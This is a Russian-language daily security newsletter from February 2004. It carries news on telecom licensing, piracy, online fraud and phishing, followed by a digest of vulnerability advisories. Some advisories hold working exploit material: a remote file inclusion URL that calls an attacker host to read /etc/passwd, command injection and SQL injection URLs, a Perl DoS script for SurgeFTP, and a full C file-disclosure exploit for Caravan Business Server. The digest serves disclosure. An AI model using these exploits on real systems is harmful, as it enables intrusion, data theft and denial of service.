Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Информационная безопасность: новости, статьи, обзоры" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
15 новостей по информационной безопасности каждый день
Информационный Канал Subscribe.Ru |
Содержание
- События, семинары, конференции, даты
- Регулирование: Законы, постановления, сертификация, контроль
- Проблемные ситуации, информационная преступность, сетевые войны
- Информационая безопасность бизнеса
- Информационая безопасность государственной власти
- Дыры и патчи программ и операционных сред
События, семинары, конференции, даты |
В июне 2004 г. в Саратове пройдет 3-й всероссийский фестиваль интернет-проектов "Новая реальность XXI века".
5 февраля | bizon.ruВ июне 2004 г. в Саратове будет проходить 3-й всероссийский фестиваль интернет-проектов "Новая реальность XXI века". Первые два фестиваля, состоявшиеся в 2002-2003 г. проводились под патронатом Министерства по связи и информатизации РФ и Полномочного представителя Президента Российской Федерации в Приволжском федеральном округе С. Кириенко и вызвали большой интерес со стороны органов государственной власти, местного самоуправления и бизнес сообщества регионов. Основная цель мероприятия – на основе систематизации опыта работы органов власти и делового сообщества регионов в сети Интернет, стимулировать общественный интерес к практическому применению в жизни возможностей новой информационной среды, новых компьютеров и устройств доступа в сеть, лицензионного программного обеспечения Фестиваль 2004 г. будет состоять из ряда мероприятий: научно-практической конференции, выставки новых технологий и техники, конкурса интернет-проектов, круглых столов по тематическим вопросам.
Регулирование: Законы, постановления, сертификация, контроль |
"ВымпелКом" готов сотрудничать с прокуратурой
5 февраля | astera"ВымпелКом" выступил с заявлением, в котором
говорится, что "ВымпелКом" и его дочерние предприятия осуществляют деятельность
в соответствии с российским законодательством и имеют все лицензии, необходимые
для оказания услуг связи в стандарте GSM. При этом компания заявляет о своей
открытости и готовности сотрудничать с прокуратурой.
Выступить с подобным
заявлением оператора вынудило возбужденное против него уголовное дело. В
постановлении о возбуждении дела, говорится, что поводом для этого шага стал
факт осуществления "ВымпелКомом" незаконной предпринимательской деятельности без
специального разрешения (лицензии) с извлечением прибыли в особо крупном
размере.
В заявлении оператора подчеркивается, что в Москве и Московской
области "ВымпелКом" владеет лицензией на оказание услуг в стандарте GSM свою
100%-ую "дочку" КБ "Импульс". При этом КБ "Импульс" является фактическим
владельцем лицензии на GSM и оператором, оказывающим услуги в этом стандарте с
помощью "ВымпелКома", причем последний выступает в качестве его агента. В
заявлении отмечен тот факт, что эти взаимоотношения существуют с 1997 г. и в
течение последних шести лет многократно проверялись регулирующими органами, и до
внеплановой проверки в декабре 2003 г. никогда не вызывали никаких
вопросов.
Компания заявляет о своей полной готовности сотрудничать с
прокуратурой по данному делу. "ВымпелКом" является открытой и прозрачной
компанией, ценные бумаги которой находятся в свободном обращении на Нью-Йоркской
фондовой бирже, и которая ставит своей целью защиту интересов клиентов и
акционеров. Компания уверена в том, что по мере установления фактов, правота ее
позиции будет полностью доказана. Компания надеется на оперативное и
справедливое расследование по делу со стороны прокуратуры,"- говориться в
заявлении "ВымпелКома".
С похожими заявлениями выступала другая дочерняя
структура "Альфа групп", "Альфа-банк", когда в ноябре 2003 г. ФСБ проводило
обыски сначала в ее петербургском, а затем и московском офисах. Тогда
руководство банка заявляло, что банк готов предоставить любую необходимую
информацию и будет содействовать правоохранительным органам в целях обнаружения
и пресечения фактов незаконных операций в финансовой сфере.
Проблемные ситуации, информационная преступность, сетевые войны |
Крыму пресечена деятельность подпольного цеха по комплектации и продаже пиратской продукции
5 февраля | http://www.crime-research.ru/Деятельность подпольного цеха по комплектации и продаже «пиратских» DVD-дисков с
видеофильмами и CD-дисков с видеоиграми для игровых и компьютерных приставок
была пресечена в Симферополе (Украина) сотрудниками Государственной службы по
борьбе с экономическими преступлениями.
В Центре общественных связей
Главного управления МВД Украины в Крыму сообщили, что нелегальное предприятие
располагалось в подвале одного из многоэтажных домов в помещении компьютерного
клуба. В ходе контрольной закупки сотрудники милиции приобрели 300 DVD-дисков на
сумму 3300 гривен. При проверке компьютерного клуба установлено, что его
28-летний владелец, помимо оказания информационных услуг населению, использовал
помещение для комплектования и продажи контрафактной продукции.
Правоохранители изъяли свыше 8 тысяч DVD-дисков, несколько тысяч
полиграфических обложек, огромное количество пустых пластиковых боксов под
диски, а также комплектующие детали для игровых приставок. При проведении
внешнего осмотра изъятой продукции установлено, что около 300 DVD-дисков -
порнографического содержания.
Всего сотрудниками УГСБЭП изъято
«пиратского» товара на сумму свыше 100 тысяч гривен. По имеющимся оперативным
данным, контрафактная продукция приобреталась в Москве и поступала в Крым
железнодорожным транспортом. В настоящем времени решается вопрос о возбуждении
уголовного дела по статьям 176 и 301 Уголовного кодекса Украины.
Американцев “кинули” в Сети на 437 миллионов долларов
5 февраля | http://www.crime-research.ru/Федеральная Торговая Комиссия (FTC) США отмечает в 2003 году почти 40% рост
случаев мошенничества, по сравнению с 2002 годом.
В ходе опроса,
проведенного компанией Ipsos-Reid, 18% американцев заявили, что они стали
жертвами мошенничества при совершении покупки в Интернете. По статистике
государственной организации Internet Fraud Complaint Center, ежегодно с жалобами
на жуликов, орудующих во Всемирной Сети, обращаются более 75 тыс. жителей США.
Однако лишь каждый пятый пострадавший сообщает о преступлении в
правоохранительные органы.
В общей сложности аферисты, используя
украденные данные, устраивая поддельные аукционы и мошеннические
интернет-магазины, обманули американцев больше, чем на 437 миллионов долларов.
В среднем пострадавший от мошенничества пользователь потерял 228
долларов.
Информационая безопасность бизнеса |
Visa «убивает» фальшивые веб-сайты
5 февраля | runetСегодня международная компания Visa обнаружила и закрыла ряд «веб-ресурсов обманок», организаторы которых пытались выудить персональную информацию у владельцев кредитных карточек.
Кроме того, Visa предупредила о появлении серии электронных запросов, которые запустили онлайновые мошенники.
«К сожалению, криминальные личности постоянно ищут новые
пути, чтобы заставить потребителей раскрыть финансовую информацию», -
прокомментировал Брюс Мэнсфилд, генеральный менеджер компании в Австралии и
Новой Зеландии. – «Время от времени злоумышленники имитируют официальные
веб-сайты компаний, чтобы завладеть персональной информацией клиентов.Visa не
застрахована от подобной практики. Тем не менее, компания предпринимает
определенные шаги в направлении безопасности обладателей кредиток».
Незамедлительные меры по оповещению клиентов остаются одним
из самых важных методов пресечения активности мошенников.
Представители финансовых структур постоянно предупреждают своих клиентов, что никогда, ни при каких обстоятельствах они не обращаются за конфиденциальной информацией по телефону или по электронной почте, - свидетельствует AustralianIT.
Microsoft начала новую атаку на Linux и IBM
5 февраля | securitylab.ruДо сих пор Microsoft, подкрепляя свои доводы результатами заказных исследований и рекламной кампанией Get the Facts, доказывала, что «общая стоимость владения» у ее продуктов ниже, чем у Linux и других программ с открытым исходным кодом. Теперь она пытается перевести спор в плоскость взаимодействия приложений.
Если мишенью первой рекламной кампании служила Linux, то для демонстрации преимуществ в области взаимодействия мальчиком для битья становится IBM. Во вторник Мартин Тейлор, генеральный менеджер Microsoft по стратегиям платформ, похвастался в интервью, что Microsoft опередила IBM по результатам опроса покупателей ИТ, проведенного Jupiter Research по заказу Microsoft.
По словам Тейлора, Microsoft перенесла фокус с общей стоимости владения на взаимодействие. А следующим этапом, учитывая сегодняшний интерес к вопросам безопасности, станет надежность, сообщил он, добавив, что приоритеты выбираются, исходя из пожеланий заказчиков.
Взаимодействие действительно становится серьезной проблемой, когда в процесс обработки бизнес-транзакций включаются такие технологии, как интернет, веб-сервисы и XML (Extensible Markup Language). Крупные компьютерные компании рисуют будущее, в котором множество разных прикладных программ взаимодействуют между собой, направляя в сеть потоки XML-сообщений. Например, розничный продавец может пользоваться услугами другой компании для учета платежей по кредитным картам, а корпорация — оперативно обновлять сведения о материальных запасах и поставках по данным, поступающим от поставщиков и дистрибьюторов.
Тейлор сослался на ряд исследований, которые придерживаются более «прагматичного» подхода к критике конкурентов. Предыдущая стратегия — высмеивание философии программирования open-source как «Pac-Man-подобной» или канцерогенной — дала болезненную отдачу.
Исследования, выполненные по заказу Microsoft, оказались спорными. После того как компания огласила содержание отчета Forrester Research, согласно которому расходы на разработку для Windows оказались ниже, чем для Linux, аналитическая фирма изменила свою политику, запретив компаниям, заказавшим исследования, публиковать их результаты.
В декабре Jupiter опросила 800 покупателей ИТ, работающих в американских компаниях с годовым доходом не ниже 10 млн долл., интересуясь их мнением о способности разного ПО к взаимодействию. Продуктам Microsoft отдали предпочтение 72% опрошенных — больше, чем любой другой компании.
Второе место по этому критерию заняла Oracle (68%). IBM оказалась на третьем месте, а Sun Microsystems — на четвертом. Hewlett-Packard и Linux-компании разделили пятое место — предпочтение их программам по способности к взаимодействию отдали 55% опрошенных.
Однако аналитик RedMonk Стивен Огрейди ставит под сомнение один из аспектов исследования — число опрошенных компаний, которым требуется такое взаимодействие. Всего у 36% опрошенных фирм имеется ИТ-среда с технологиями от разных поставщиков, тогда как в 37% компаний применяются только платформы Microsoft. «Мне уже много месяцев не встречались однородные среды», — говорит Огрейди, имея в виду заказчиков, использующих технологию от единственного поставщика.
IBM критикует это исследование. «Заказной отчет, основанный на сомнительных критериях, мало что добавляет к очень важной дискуссии об ИТ-интеграции», — сказал представитель IBM Стив Айзенштадт.
А представительница Red Hat встала на защиту Linux. «Red Hat Enterprise Linux доступна на семи платформах, так что ее легче интегрировать в неоднородную среду», — сказала она. Red Hat Linux, как и SuSE Linux от Novell, работает на системах с процессорами Intel Xeon и Itanium, AMD Opteron и четырех семействах серверов IBM.
Исследование выявило, что список технологий, посредством которых компании предпочитают связывать между собой приложения, возглавляют веб-сервисы — технология, первоначально предложенная IBM и Microsoft, но теперь усовершенствованная и стандартизованная многими другими компаниями. 55% опрошенных поставили стандарты веб-сервисов на первое место.
Как правило, XML и веб-сервисы основаны на открытых стандартах, облегчающих взаимодействие, однако использование XML не дает гарантии открытости. Способность ПО Microsoft к взаимодействию опирается главным образом на XML, но при этом софтверный гигант старается сделать многие XML-технологии закрытыми. Компания подала целый ряд заявок на патенты, некоторыми из которых она сможет воспользоваться для отсечения конкурирующих продуктов. Однако возможно, что Microsoft предоставит бесплатный доступ к своим XML-инновациям, как она недавно поступила с проприетарным XML-диалектом (схемами), применяемым в Office 2003.
Microsoft не стремится к взаимодействию с какой-нибудь Linux-технологией. Подтвердив свою точку зрения, высказанную в январе на выставке-конференции LinuxWorld, Тейлор сказал, что за то, чтобы Linux правильно обменивалась файлами с Windows-системами, отвечать должно сообществл разработчиков open-source. Он привел в пример ситуацию середины 90-х, когда Microsoft взяла на себя работу по инженерному анализу технологии связи Novell IPX/SPX, чтобы сделать Windows-машины легко подключаемыми к сетям Novell.
Как бы то ни было, исследование Jupiter показало, что ИТ-покупателей больше заботит способность приложений взаимодействовать друг с другом, чем простота совместной работы с файлами или подключения компьютеров к сети.
Успех кампании Microsoft Get the Facts на сегодняшний день Огрейди считает спорным. С одной стороны, «тактический успех был впечатляющим, так как реклама вызвала большой интерес и в Microsoft поступало много звонков по этому поводу». Но, с другой, говорит Огрейди, «я не вижу, чтобы кампания добилась заметных успехов на ниве перевода аргументации в неэмоциональную плоскость, на что ее авторы, по-моему, рассчитывали. Разве что породила споры в некоторых кругах».
Информационая безопасность государственной власти |
Минсвязи РФ опубликовало приказ, регламентирующий порядок контроля за соблюдением условий лицензий на предоставление услуг связи
5 февраля | asteraМинсвязи РФ опубликовало приказ, регламентирующий
порядок контроля за соблюдением условий лицензий на предоставление услуг связи.
Текст приказа обнародован пресс-службой Минсвязи РФ.
Приказ Министра РФ
по связи и информатизации N165 от31.12.2003 г называется "Об организации
контроля за соблюдением юридическими лицами и индивидуальными предпринимателями
лицензионных условий лицензий на осуществление деятельности в области оказания
услуг связи". Приказ издан в связи со вступлением в силу 1 января 2004 г закона
"О связи", в соответствие с которым, контроль за соблюдением условий лицензий в
области связи и информатизации является прямой функцией Минсвязи
РФ.
Приказ возлагает лицензионный контроль на департамент по надзору за
связью и информатизацией (ДНСИ) Минсвязи. Решения о продлении срока действия
лицензии, о приостановлении действия лицензии, о возобновлении действия лицензии
и предупреждений о приостановлении действия лицензии будут приниматься
Министерством связи на основании представлений департаментов министерства и
региональных органов государственного контроля за связью.
Предписания об
устранении нарушения, связанного с несоблюдением норм, установленных
федеральными законами и иными нормативными правовыми актами в области связи
(обязательных требований в области связи), а также предписания об устранении
нарушений лицензиатом лицензионных условий по представлению государственного
инспектора по надзору за связью и информатизацией в Российской Федерации от
имени Минсвязи России могут выдавать: руководитель департамента по надзору за
связью и информатизацией (ДНСИ) Минсвязи России и его заместители, начальники
отделов ДНСИ и их заместители, начальники государственных учреждений -
управлений государственного надзора за связью и информатизацией в субъектах
Российской Федерации и их заместители.
Приказ вступил в силу с 1 января
2004 года.
Дыры и патчи программ и операционных сред |
Удаленное выполнение произвольных команд в iSearch
5 февраля | securitylab.ru
Программа: iSearch Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в iSearch. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе. Пример: http://[target]/isearch/isearch.inc.php?isearch_path=http://[attacker]?&cmd=cat /etc/passwd URL производителя: http://www.isearchthenet.com/isearch/index.php Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Локальный отказ в обслуживании в Sun Solaris на SPARC системах
5 февраля | securitylab.ru
Программа: Solaris SPARC 2.6, 7, и 8 Опасность: Наличие эксплоита: Да Описание: Уязвсимость обнаружена в Sun Solaris на SPARC системах в функции 'tcsetattr'. Локальный пользователь вызвать отказ в обслуживании. На PCI системах локальный пользователь может использовать функцию tcsetattr(3C) чтобы сбросить серийный порт и завесить работу системы. URL производителя: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57474 Решение:Установите соответствующие исправления: SPARC Platform * Solaris 2.6 with patch 105924-12 or later * Solaris 7 with patch 107589-06 or later * Solaris 8 with patch 109815-20 or later * Solaris 9 |
DoS против SurgeFTP Server
5 февраля | securitylab.ru
Программа: SurgeFTP Server 2.2k1 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в SurgeFTP Server. Удаленный пользователь может аварийно завершить работу FTP сервера. Пример: http://[server]:7021/cgi/surgeftpmgr.cgi?cmd=%% http://[server]/cgi/?r34ct=%di e% Пример/Эксплоит: ----------$r34ct-rainbow.pl ------ #!/usr/bin/perl use IO::Socket; printf "SurgeFtp 2.2k1\n\n"; if(@ARGV < 2) { die "\nUsage: host port \n"; } $port = @ARGV[1]; $host = @ARGV[0]; $sock =new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto => "TCP"); print $sock "GET /cgi/surgeftpmgr.cgi?cmd=%% http/1.0\n\n"; while (<$sock>){print} close ($sock); print("\n\n"); exit; ---end----- URL производителя: http://netwinsite.com/surgeftp/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Межсайтовый скриптинг в Forum Web Server
5 февраля | securitylab.ruПрограмма: Forum Web Server 1.6 и более ранние версии
Опасность: Низкая
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в Forum Web Server. Удаленный пользователь может выполнить XSS нападение.
Программное обеспечение не фильтрует поле 'Subject' при добавлении нового сообщения ('post1.htm') или поля 'File Description' в сценарии 'postfile2.htm. В результате удаленный пользователь может выполнить произвольный код сценария в браузере целевого пользователя.
URL производителя:http://www.minihttpserver.net/bbs/index.php
Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.
SQL инъекция в PhotoPost PHP Pro
5 февраля | securitylab.ru
Программа: PhotoPost PHP Pro 4.6 и более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость в проверке правильности входных данных обнаружена в PhotoPost PHP Pro. Удаленный пользователь может внедрить произвольные SQL команды. Пример/Эксплоит: http://address/directory/showphoto.php?photo=[query] URL производителя: http://www.photopost.com/ Решение:Установите соответствующее обновление: http://www.photopost.com/members/forum/showthread.php?s=&threadid=98113 |
Поднятие локальных привилегий в Linux ядре
5 февраля | securitylab.ru
Программа: Linux 2.4 Kernel до версии 2.4.22 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Linux ядре в R128 DRI драйвере. Локальный пользователь может получить поднятые привилегии на системе. Уязвимость связана с "R128 DRI limits checking." Дополнительные подробности не раскрываются URL производителя: http://www.kernel.org Решение:Уязвимость устранена в Linux Kernel 2.4.22 и более поздних версиях |
Удаленное выполнение произвольного кода в Leif M. Wright Web Blog
5 февраля | securitylab.ru
Программа: Leif M. Wright Web Blog 1.1.15 Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Leif M. Wright Web Blog. Удаленный пользователь может выполнить произвольные команды на системе. Удаленный атакующий может представить специально обработанный URL, чтобы выполнить произвольные команды не целевой системе с привилегиями Web сервера: http://[target]/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=|command| URL производителя: http://leifwright.com/scripts/Blog.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Несколько уязвимостей в JBrowser
5 февраля | securitylab.ru
Программа: JBrowser 2.3 и 2.4 Опасность: Средняя Наличие эксплоита: Да Описание: Две уязвимости обнаружены в JBrowser. Удаленный пользователь может просматривать произвольные файлы с привилегиями Web сервера. Удаленный пользователь может также получить доступ к административным сценариям в конфигурации по умолчанию. 1. Просмотр произвольных файлов: http://[target]/browser.php?directory=[ATTACKER_SPECIFIED_PATH]2. Доступ к административным сценариям: http://[target]/_admin/ http://[target]/_admin/list_all.php?folder=./ http://[target]/_admin/upload.php URL производителя: http://jpage.free.fr/j/index_fr.php?p=jscripts#jbrowser Решение:Установите обновленную версию программы. |
Множественные уязвимости в Crob FTP Server
5 февраля | securitylab.ru
Программа: Crob FTP Server 3.5.1 Опасность: Низкая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в Crob FTP Server. Удаленный пользователь может просматривать содержание директории на целевой системе. Удаленный пользователь может также аварийно завершить работу FTP сервера. Удаленный авторизованный пользователь (включая анонимного пользователя) может использовать следующую команду, чтобы просматривать содержание директорий на целевой системе, расположенных вне FTP root каталога. Пример: dir ./././././*Также удаленный пользователь может использовать следующую команду, чтобы аварийно завершить работу FTP сервера: dir .................................................... ./* URL производителя: http://www.crob.net/studio/ftpserver/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
DoS против ChatterBox
5 февраля | securitylab.ru
Программа: ChatterBox 2.0 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в ChatterBox. Удаленный пользователь может аварийно завершить работу chat сервера. Удаленный пользователь может послать некорректную строку, чтобы аварийно завершить работу chat сервера. Пример: aaaaaa URL производителя: http://www.urbancities.net/burton/programs/chatterbox.html Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Просмотр и записть произвольных файлов в Caravan Business Server
5 февраля | securitylab.ru
Программа: Caravan Business Server и более ранние версии Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Caravan Business Server. Удаленный пользователь может просматривать и записывать файлы вне Web каталога. Уязвимость обнаружена в сценарии showcode.asp. Пример/Эксплоит: /* Showcode exploit for Caravan Web server $dr_insane@pathfinder.gr 2004 $http://members.lycos.co.uk/r34ct/ ------- linux:~ # ./r34ct-wat3rf4ll http://insane test.asp Showfile exploit by Dr_insane,2004 Connecting with localhost ... Connected Testing: GET /sample_showcode.html HTTP/1.0 200 OK server localhost has the showcode.asp Sending exploit... ------- How this exploit works: ----------------------- Firstly, it will try to connect on the host you specify on port 80. If everything is Ok it will look for the file sample_showcode and if the file exists it will try to exploit it. duhh i forgot..If you want to change the server port look for the "sin.sin_port" in the code. -----------------------*/ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <stdlib.h> #include <unistd.h> int own; int greek(char *host) { struct sockaddr_in sin; struct hostent *hp; hp = gethostbyname(host); if (hp==NULL) { fprintf(stderr,"Cannot find: %s\n\n",host); return 0; } memset((char*) &sin,0, sizeof(sin)); memcpy((char *) &sin.sin_addr,hp->h_addr,hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(80); own = socket(AF_INET, SOCK_STREAM, 0); if((connect(own,(struct sockaddr *) &sin, sizeof(sin))) < 0) { fprintf(stderr,"Cannot connect with %s.\n",host); return 0;} return 1; void main(int argc, char *argv[]){ char total[16384]; char *ok=NULL; char *buffer; char *ins; char *test="GET /sample_showcode.html"; char *path="?fname=/././././././././"; char *http=" HTTP/1.0\n\n"; int i; fprintf(stderr,"\nShowfile exploit by Dr_insane,2004\n"); if (argc <= 2) { printf("Usage: %s <Server> <file>\n", argv[0]); exit(1); } for(i=1;i<argc-1;i++) { fprintf(stderr,"Connecting with %s ...",argv[i]); if(greek(argv[i])) { fprintf(stderr,"Connected.\n"); strcpy(total,test); strcat(total,http); fprintf(stderr,"Testing: %s",total); send(own,total, sizeof(total),0); ins=(char *)malloc(1024); read(own,ins, 1024); ok=strstr(ins,"200"); if(ok!=NULL) { fprintf(stderr,"OK, server %s has the showcode.asp\n",argv[i]); memset(total,0,sizeof(total)); strcpy(total,test); strcat(total,path); strcat(total,argv[argc-1]); strcat(total,http); fprintf(stderr,"Sending %s",total); greek(argv[i]); send(own,total,sizeof(total),0); printf("\n*** Server: %s ***\n",argv[i]); buffer=(char *)malloc(40000); while(read(own,buffer,1)>0) printf("%s",buffer); } else { fprintf(stderr,"server %s hasn't showcode.asp...\n",argv[i]); } printf("\n"); free(buffer); free(ins); close(own); } } URL производителя: http://www.nititelecom.com/caravan/start.asp Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
DoS против BaSoMail
5 февраля | securitylab.ru
Программа: BaSoMail 1.24 Опасность: Низкая Наличие эксплоита: Да Описание: Отказ в обслуживании обнаружен в BaSoMail. Удаленный пользователь может вызвать условия отказа в обслуживании. Удаленный пользователь может установить чрезмерно большое количество подключений (более 500) к 25 или 110 порту, чтобы заставить сервер использовать 100% CPU. URL производителя:http://www.baso.no/load.asp?id=4 Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Удаленный отказ в обслуживании против A-A-S Application Server
5 февраля | securitylab.ru
Программа: A-A-S Application Server 1.0.37 Опасность: средняя Наличие эксплоита: Да Описание: Переполнение буфера обнаружено в A-A-S Application Server. Удаленный авторизованный пользователь может аварийно завершить работу сервера. Пример/Эксплоит: http://[target]:6262/[1530*char] URL производителя: http://www.applicationaccessserver.de/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Удаленный отказ в обслуживании против Cisco 6000/6500/7600
5 февраля | securitylab.ru
Программа: Cisco 6000, 6500, 7600 routers; 12.1E, 12.2SY, 12.2ZA Опасность: Высокая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Cisco 6000/6500/7600 в обработке пакетов второго уровня. Удаленный пользователь может вызвать отказ в обслуживании. Удаленный пользователь может послать специально сформированный фрейм 2-го уровня, который инкапсулирует независимый от протокола пакет 3-го уровня на целевую систему. Если длина фрейма 2-го уровня не соответствует длине инкапсулированного пакета третьего уровня и если пакеты программно коммутируются на целевой системе, то целевая система может зависнуть или аварийно завершить работу. Согласно CISCO, уязвимость в некоторых случаях может эксплуатироваться из удаленной системы, не входящей в локальный сетевой сегмент. Уязвимость возможна, когда специально сформированный фрейм 2-го уровня проходит через все промежуточные устройства 3-го уровня без отсечения. Cisco сообщает, что только 6000/6500/7600 системы перенаправляют подобные специально сформированные фреймы не исправляя их. Уязвимы системы Cisco 6000/6500/7600 серий с with MSFC2 и FlexWAN или OSM модулями. Также, уязвимы Cisco 6000/6500/7600 системы с MSFC2, которые запущены на CISCO IOS 12.1(8b)E14, даже если они не имеют FlexWAN или OSM модуля. URL производителя: http://www.cisco.com/warp/public/707/cisco-sa-20040203-cat6k.shtml Решение:Установите соответствующее обновление: http://www.cisco.com/warp/public/707/cisco-sa-20040203-cat6k.shtml |
Другие публикации: |
Отказ в обслуживании в FreeBSD
5 февраля | securitylab.ru
Программа: FreeBSD Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в FreeBSD в TCP maximum segment size (MSS) выполнении. Удаленный пользователь может выполнить отказ в обслуживании. Удаленный пользователь может установить чрезмерно низкое MSS значение в течении TCP подключения, чтобы заставить целевую систему послать множество маленьких IP пакетов. В быстрой сети, система может генерировать больше пакетов в секунду, чем способен обработать центральный процессор. Также сообщается, что удаленный пользователь может послать TCP пакеты с TCP грузом не менее одного байта, чтобы заставить выполнить функцию tcp_input() и sowakeup() запрос, которые будет послан (signalled) к связанному процессу на целевой системе, потребляя чрезмерные ресурсы на целевой системе. URL производителя:http://lists.freebsd.org/pipermail/cvs-src/2004-January/016271.html Решение:Исправление доступно через CVS для следующих файлов: ip_icmp.c, tcp.h, tcp_input.c, tcp_subr.c, tcp_usrreq.c, and tcp_var.h. |
Инструменты управления содержанием Метод.ру
Дата создания документа: 17:20 05.02.04
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||